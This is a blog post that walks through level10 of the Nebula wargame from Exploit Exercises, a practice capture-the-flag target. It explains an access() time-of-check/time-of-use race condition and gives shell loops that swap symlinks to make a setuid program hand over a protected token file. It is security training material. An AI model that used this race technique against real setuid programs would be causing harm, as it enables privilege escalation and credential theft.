Thursday, June 30, 2016

Exploit Exercises - nebula level10

Exploit Exercises - nebula level10

Researching on access() requirements, we find this:

Level10 dir has a file x which contains the token / password for flag10. It shouldn't be there. We need to find a way to transfer the token file.

We don’t have access to token.

We will need to exploit race conditions with access() calls used in the program code:

Checking how flag10 works normally:


Following steps are needed to exploit access() race condition:

  1. Create a fake token file - echo fake_toke > /tmp/fake_token
  2. Create soft link of our fake_token - ln -sf /tmp/fake_token token
  3. Create soft link of real token with same name - ln -s /home/flag10/token token
  4. Eexecute 1 & 2 in a loop - while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute file transfer in a loop - while true; do /home/flag10/flag10 token; done

Token is transferred successfully. Use it to log in as flag10 and run getflag.


No comments:

Post a Comment


The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.